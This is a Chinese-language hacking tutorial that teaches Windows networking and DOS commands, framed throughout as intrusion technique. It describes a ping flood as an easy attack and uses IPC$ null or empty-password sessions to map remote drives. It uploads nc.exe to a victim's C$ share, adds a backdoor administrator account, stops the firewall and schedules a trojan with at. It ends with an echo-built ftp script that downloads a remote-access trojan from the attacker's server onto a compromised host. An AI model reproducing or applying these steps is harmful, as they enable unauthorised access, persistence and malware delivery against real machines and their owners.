一,ipconfig /all
显示所有网络适配器(网卡、拨号连接等)的完整TCP/IP配置信息。与不带参数的用法相比,它的信息更全更多,如IP是 否 动态分配、显示网卡的物理地址等。可以不用带参数,直接ipconfig
大家可以比较一下
二,ping
它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。
Ctrl+c停止
-l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。
-n 定义向目标IP发送数据包的次数,默认为4次。如果网络速度比较慢,4次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。
说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如"ping IP -t -n 4",虽然使用了-t参数,但并不是一直ping下去,而是只ping 4次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。
下面我们举个例子来说明一下具体用法。
比如我们想知道百度的IP。可以这样: ping www.baidu.com
Reply from 192.168.174.1: bytes=100 time<1ms TTL=128
bytes=100 就是数据包的大小
这里time<1ms表示从发出数据包到接受到返回数据包所用的时间是小于1毫秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说"初步判断"是因为这个值是可以修改的。这里TTL=128表示操作系统可能是xp。
(小知识:如果TTL=128左右,则表示目标主机可能是Win2000或xp或路由器;如果TTL=250,则目标主机可能是Unix,也有可能是路由器,大家自己测试一下,多了就熟悉了)
至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。 不过现在很多服务器都过滤的ping的数据包,所以有很多ping不通的情况。
就像我们上次用防火墙过滤ping的数据包一样。
三,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的IP,就可以得到它的NETBIOS信息
可以看出远程主机的机器名,探测下虚拟机 8A0A688F0ECC46A,这是远程主机的机器名。
我们看下虚拟机,一样的。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,有时候很多人会用自己的名字做机器名的,这又增加了我们入侵的保险系数。
四,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,为了防止被发现所以现在很多木马都采用了隐藏进程和端口的技术。
用法:netstat -a 。
-n 列出当前的开放端口,可以知道当前机器所开的服务等信息。用法:netstat -n
由于没有上网所以就只能什么看不到了,用 -a 看下本机,这里看到我这里开了3389这个端口。自己关掉,没有了。
五,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。用法:tracert IP。
只有一跳,就是本机,可以tracert百度试试
六,net (重点)
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是 微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view /IP。
可以看到的只是我们先前共享的文件夹,而如果C盘共享的话是看不到的。
net share
此命令用来查看本地开启的共享 ,也可共享指定盘符。
net share c$=c:/ 将C盘共享
net share c$ /del 删除C:共享
可以看到XP默认的只共享了ipc,而2000则默认共享了ipc和c盘
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用
net use //ip/ipc$ 建立IPC空链接 (只是说明远程主机开放135端口并共享ipc)
net use //ip/ipc$ “密码” /user:用户名 建立IPC非空链接 (获得主机的用户名和密码)
示例:net use //192.168.174.129/ipc$ “” /user:administrator ""表示密码为空
net use z: //ip/c$ 登陆后映射对方C:到本地为z: (2000可以直接使用,xp需要开对方共享)
一般2000系统下默认的 c盘是共享的,所以我们建个IPC连接后可直接映射对方的 C盘,但是xp默认情况下是只共享ipc$的,至于盘的共享需要telnet上去后手工开启,然后才可以映射到本地。
刚才在XP下试了几次映射对方磁盘都出错,所以就用2000做实验了(XP和2000都是新装的系统),对于xp实际情况中也是需要telnet才能映射磁盘,但是我们既然能telnet上去也就没必要映射对方的盘了,可以直接用ftp下载,所以这里就简单的演示下了。看下效果
2000是成功的。XP虽然出错也给大家演示下
虽然我的xp是空密码但是链接不上,原因的话应该就是配置的问题和服务的问题了。既然连不上还讲什么?其实实际入侵中多数情况下是可以连上的。
建立了IPC$连接后,对方有开共享的话,就可以上传文件了:
copy nc.exe /192.168.174.128/c$,或copy c:/nc.exe /192.168.174.128/c$
表示把本地目录下的nc.exe传到远程主机C盘,结合后面要介绍到的其他DOS命令就可以实现入侵了。 下面简单操作下
net use z: /del 删除映射对方到本地的为z:的映射
net use * /del 删除所有连接
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start 服务名
开启服务;(如:net start telnet, net start schedule,前提是服务未禁用。遗憾的是这两常用的命令默认情况下都是禁用的。要用到另外的命令了,后面我们会讲到)
这里以系统防火墙为例:net start sharedaccess
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
如 net stop sharedaccess 关掉系统防火墙
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的, 最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。
net user 账户 可以查看相应账户的信息
net localgroup :
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。
用法:net localgroup groupname username /add。
其中administrators组的权限最大
示例:
net user longyu tianlang /add 建立一个用户名为longyu密码为tianlang的账户
net localgroup administrators longyu /add 把“longyu”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net user 查看有哪些用户
net user longyu 查看帐户的属性
net user longyu /del 删掉用户longyu,这里不用输密码了
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。
用法:net time /IP。
net time //127.0.0.1 ,127.0.0.1 系统的保留IP地址,可以用来ping 127.0.0.1 测试网卡有没有装好
查看远程主机时间
七,at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?),而且这个命令是系统权限的,可以用来解除注册表的一个限制,后面的实例中会用到。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command /computer。
例如:at //192.168.174.129 12:12 c:/longyu.exe 建立ipc连接后在本机执行
如何启动at服务后面会讲到, 去2000里看下,好了。
at 12:12 C:/longyu.exe telnet到对方后执行,longyu.exe是我们传到对方c盘点木马
at /delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会 被删除。
at /yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
错误是因为c盘没有指定的文件。这个没关系
八,telnet (重点)
功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。
然后在提示符下键入telnet IP回车,这时就出现了登陆窗口(当然前提是telnet服务是开启的,后面会讲到如何开启),让你输入合法的用户名和密码,这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的.可能的原因包括不允许空密码 我们去XP上见个账户,实际情况中也很少出现这种情况
好了,进来了。刚才的administrator 和空密码登录不进去的情况实际中也不很多见。后面会通过一些实例帮助大家解决这些问题。
telnet还可以用来探测服务器的类型,比如对方开了80端口,我们可以用telnet IP 80 通过返回信息判断对方系统类型。这里就不操作了
注意:windows的命令行是不区分大小写的
快速调用命令可以按方向键的上和下来执行已经执行过的命令
相信大家以前也可能看过一些书过教程,有时候按照上面的方法做并不一定能成功,就像今天我们遇到的这些问题,都是很多教程中所没有的,而我们所要做的就是积累这些问题然后找到解决方法,这就是一个提高的过程。后面的教程中会解决所遇到的问题。当然也还有许多新的问题在等着我们。
好了,这节课到这里,拜拜。
------------------------------------------------------------------------------------
一)md——建立子目录
1.功能:创建新的子目录
2.类型:内部命令
3.格式:md[盘符:][路径名]〈子目录名〉
4.使用说明:
(1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;
(2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。
例:(1)在C盘的根目录下创建名为longyu的子目录;(2)longyu子目录下再创建tianlang子目录。
C:/>md longyu (在当前驱动器C盘下创建子目录longyu)
C:/>md longyu/tianlang(在longyu子目录下再创建tianlang子目录)
(二)cd——改变当前目录
1.功能:显示当前目录
2.类型:内部命令
3.格式:cd[盘符:][路径名][子目录名]
4.使用说明:
(1)如果省略路径和子目录名则显示当前目录;
(2)如采用“cd/”格式,则退回到根目录;
(3)如采用“cd..”格式则退回到上一级目录。
例:(1)进入到tianlang子目录;(2)从tianlang子目录退回到子目录;(3)返回到根目录。
C:/>cd longyu/tianlang(进入longyu子目录下的tianlang子目录)
C:/>longyu/tianlang >cd..(退回上一级根目录)
C:/>longyu>cd/ (返回到根目录)
C:/>
(三)del——删除文件命令
1.功能:删除指定的文件。
2.类型:内部命令
3.格式:del [盘符:][路径]〈文件名〉[/P]
4.使用说明:
(1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;
(2)该命令不能删除属性为隐含或只读的文件;
(3)在文件名称中可以使用通配符;
(4)若要删除磁盘上的所有文件(DEL*·*或DEL·),则会提示:(Arey ou sure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业
看操作就好了
(四)rd——删除子目录命令
1.功能:从指定的磁盘删除子目录。
2.类型:内部命令
3.格式:rd[盘符:][路径名][子目录名]
4.使用说明:
(1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用del(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;
(2)不能删除根目录和当前目录。
例:要求把C盘longyu子目录下的tianlang子目录删除,操作如下:
第一步:先将tianlang子目录下的文件删空;
C:/>del C:/>longyu/tianlang
第二步,删除USER子目录。
C:/>longyu>rd tianlang
这样是删除文件夹里的所有文件,再用rd命令删除目录
(五)dir——显示磁盘目录命令
1.功能:显示磁盘目录的内容。
2.类型:内部命令
3.格式:dir [盘符][路径][/P][/W]
4. 使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Press any key to continue 查看windows文件夹这样文件比较多的目录是使用
/W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。
(六) copy文件复制命令
1.功能:拷贝一个或多个文件到指定盘上。
2.类型:内部命令
3.格式:COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]
4.使用说明:
(1)COPY是文件对文件的方式复制数据,复制前目标盘必须已经格式化;
(2)复制过程中,目标盘上相同文件名称的旧文件会被源文件取代;
(3)复制文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够;
(4)文件名中允许使用通配举“*”“?”,可同时复制多个文件;
(5)COPY命令中源文件名必须指出,不可以省略。
(6)复制时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略;
(7)复制时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略;
(8)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格!
将tianlang下的123.txt复制到longyu文件夹
将tianlang下的123.txt复制到longyu文件夹,并改名为456.txt
将456.txt复制到c盘根目录
(七)xcopy——目录复制命令
1.功能:复制指定的目录和目录下的所有文件连同目录结构。
2.类型:外部命令
3.格式:xcopy [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E]
4.使用说明:
(1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件;
(2)使用时源盘符、源目标路径名、源文件名至少指定一个;
(3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;
将longyu文件夹里的文件全部拷贝到router文件夹中,没有指定参数,所以只拷贝了文件而没拷贝文件夹,清空router文件夹后再拷贝一次,好了
命令记不清了就用帮助看下
(八)type——显示文件内容命令
1.功能:显示ASCII码文件的内容。
2.类型:内部命令。
3.格式:type [盘符:][路径]〈文件名〉
4.使用说明:
(1)显示由ASCII码组成的文本文件,如txt,bat,ini等,对exe,com等为扩展名的文件,其显示的内容是无法阅读的。
(2)该命令一次只可以显示一个文件的内容,不能使用通配符;
(3)如果文件有扩展名,则必须将扩展名写上;
(4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。
查看456.txt文件中的内容
(九)ren——文件改名命令
1.功能:更改文件名称
2.类型:内部命令
3.格式:ren[盘符:][路径]〈旧文件名〉〈新文件名〉
4.使用说明:
(1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名;
(2)允许使用通配符更改一组文件名或扩展名。
将456.txt改名为789.txt
(十)fc——文件比较命令
1.功能:比较文件的异同,并列出差异处。
2.类型:外部命令
3.格式:fc[盘符:][路径名]〈文件名〉[盘符:][路径名][文件名][/A][/B][/C][/N]
4.使用说明:
(1)选用/A参数,为ASCII码比较模式;
(2)选用/B参数,为二进制比较模式;
(3)选用/C参数,将大小写字符看成是相同的字符。
(4)选用/N参数,在ASCII码比较方式下,显示相异处的行号。
比较456.txt和789.txt的内容,了解就可以了,用的不多
(十一)attrib——修改文件属性命令
1.功能:修改指定文件的属性。
2.类型:外部命令。
3.格式:attrib[文件名][+R][-R][+A][-A][+H][-H][+S][-S][/S]
4.使用说明:
(1)选用R参数,将指定文件设为只读属性,使得该文件只能读取,无法写入数据或删除;选用——R参数,去除只读属性;
(2)选用+A参数,将文件设置为档案属性;选用-A参数,去除档案属性;
(3)选用+H参数,将文件调协为隐含属性;选用-H参数,去隐含属性;
(4)选用+S参数,将文件设置为系统属性;选用-S参数,去除系统属性;
(5)选用/S参数,对当前目录下的所有子目录及作设置。
将c:/456.txt设置成隐藏属性
十二、其它命令
(一)cls——清屏幕命令
1功能:清除屏幕上的所有显示,光标置于屏幕左上角。
2类型:内部命令
3格式:cls
(二)ver 查看系统版本号命令
1功能:显示当前系统版本号
2类型:内部命令
3格式:ver
----------------------------------------------------------------------------------------------
一,ftp
大家对这个命令应该比较熟悉了吧?windows系统的内部命令。网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。 这里用一个小工具做下演示,FtpServer.exe
首先打开我们的ftp服务器,设置好密码后用虚拟机登录:命令行下输入 ftp ip
如: ftp 192.168.174.1,
用户名和密码都是longyu,密码是不显示的。当提示**** logged in时,就说明登陆成功。
用?查看帮助
大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。 如:get longyu.txt c:/longyu.txt 将ftp服务器上的记事本下载到本地c盘
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以上传文件,
命令如下:put c:/longyu.txt 将本地文件传到ftp服务器上
因为我们进的是windows目录,所以文件就被传到windows目录里
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。
FTP命令主要还是用来传送文件的,比如木马或是一些在肉鸡上可用的工具,如果手动上传的话有点麻烦,我们可以建一个 记事本直接用命令运行,会省很多时间,一会举个例子。
二,echo命令
echo命令主要功能简单点说就是开启或关闭批处理命令行显示在屏幕上 ,它是批处理文件的命令,也 属于内部命令
内部命令就是常驻于内存的命令 在任意路径下输入均执行
echo命令的目的有两个:
1.避免不需要的命令显示来干扰屏幕
2.在屏幕上给用户显示提示信息
用不带参数的echo命令 则显示当前的echo状态信息
echo+ 可以利用该命令在显示中跳过一行,在建批处理命令中有实际上的意义 如:我们想独行显示 “龙域网安” ,我们可以在 龙域网安 前一句末尾添加echo+ 则可以在下一行显示该句了 大家把下面新建为 txt 后再把后缀名改为 bat 运行下试试
echo off/on 回显的打开或关闭
@echo off
echo+
echo 龙域网安欢迎你
echo+
pause (就是一个暂停,出现这句话:请按任意键继续. . .)
很简单 为了让你更好的理解。
echo命令的使用
1. 作为控制批处理命令在执行时是否显示命令行自身的开关
格式:echo [ on | off ]
下面看下打开和关闭的效果怎么样,看到了吧
2. 显示当前echo设置状态
格式:echo
3. 输出提示信息
格式:echo 信息内容
4. 建立新文件或增加文件内容
格式:echo 文件内容>文件名 写入,如果原文件有内容则覆盖
echo 文件内容>>文件名 追加,如果原文件有内容则追加在后面
echo [message]>[file name] 这个命令是把指定的字符串送到指定的文件中
注意说明:
“>>”将把内容将填加到文件原文件的末尾,“>”将原文件内容覆盖
(如果没有指定文件名则自动创建)
将 龙域网安 写入c:/longyu.txt ,再在后面加上欢迎你三个字(c盘没有此文本)
echo 龙域网安>c:/longyu.txt
echo 欢迎你>>c:/longyu.txt
C:/>type longyu.txt 显示该记事本文件
将龙域入侵系列教程写入longyu.txt并覆盖掉原有文字
显示longyu,txt的内容
也可以直接dos命令执行记事本程序
---------示例:---------------
好,下面我们就简单演示下用ftp和echo命令传送文件
利用FTP方式传输文件,这样比较稳定。拿到对方shell后不可能像本机那样一条命令一条命令的进行FTP操作。
可以把所有有关的FTP命令先用echo写到一个文件里(比如ftp.txt)然后用ftp -s:ftp.txt来执行ftp下载文件。 就用虚拟机当作肉鸡了,本机架设ftp
ftp.txt文件的内容:
open 192.168.174.1 FTP服务器 (前面我们是直接ftp ip的。这里我们用open ip是 因为后面的命令 ftp -s:ftp.txt 是执行的ftp命令,我们可以在虚拟机里看下
先进入ftp命令格式,再用open ip 和直接 ftp ip 是一样的效果)
longyu 用户名
longyu 用户密码
binary 传输模式设为二进制传输 (也可以不用)
get nc.exe 下载鸽子服务端程序
bye 退出
用echo在cmd shell里写ftp.txt文件的相应命令为 :
echo open 192.168.174.1>>ftp.txt
echo longyu>>ftp.txt
echo longyu>>ftp.txt
echo binary>>ftp.txt
echo get nc.exe>>ftp.txt
echo bye>>ftp.txt
我们去虚拟机c盘看下
当然也可以下载一些其它有用的程序到目标机上。
最后执行命令:
ftp -s:ftp.txt